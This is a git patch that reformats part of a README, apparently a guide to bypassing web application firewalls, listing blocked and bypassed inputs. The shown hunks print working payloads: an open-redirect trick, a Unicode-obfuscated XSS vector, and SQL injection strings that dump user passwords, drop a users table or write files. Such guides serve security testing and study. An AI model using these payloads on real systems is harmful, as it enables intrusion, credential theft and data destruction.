From 179eda145de20d8880d49cdd9a377d18f2ee6b18 Mon Sep 17 00:00:00 2001 From: 0xInfection Date: Fri, 21 Jun 2019 21:07:30 +0530 Subject: [PATCH] Added stuff follow up update --- README.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 067103d..dda29df 100644 --- a/README.md +++ b/README.md @@ -2334,7 +2334,7 @@ __Obfuscated__: `` __Blocked__: `/?redir=http://google.com` __Bypassed__: `/?redir=http://google。com` (Unicode alternative) -__Blocked__: `x` +__Blocked__: `x` __Bypassed__: `<marquee loop=1 onfinish=alert︵1)>x` (Unicode alternative) > __TIP:__ Have a look at [this](https://hackerone.com/reports/231444) and [this](https://hackerone.com/reports/231389) reports on HackerOne. :) @@ -2475,12 +2475,12 @@ __13. Token Breakers__ - Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature. - However, the request must still remain valid while using token-breakers. -__Case__: Unknown Token for the Tokenizer -__Payload__: `?id=‘-sqlite_version() UNION SELECT password FROM users --` +- __Case__: Unknown Token for the Tokenizer + - __Payload__: `?id=‘-sqlite_version() UNION SELECT password FROM users --` -__Case__: Unknown Context for the Parser (Notice the uncontexted bracket) -__Payload 1__: `?id=123);DROP TABLE users --` -__Payload 2__: `?id=1337) INTO OUTFILE ‘xxx’ --` +- __Case__: Unknown Context for the Parser (Notice the uncontexted bracket) + - __Payload 1__: `?id=123);DROP TABLE users --` + - __Payload 2__: `?id=1337) INTO OUTFILE ‘xxx’ --` > __TIP:__ More payloads can be crafted via this [cheat sheet](https://github.com/attackercan/cpp-sql-fuzzer).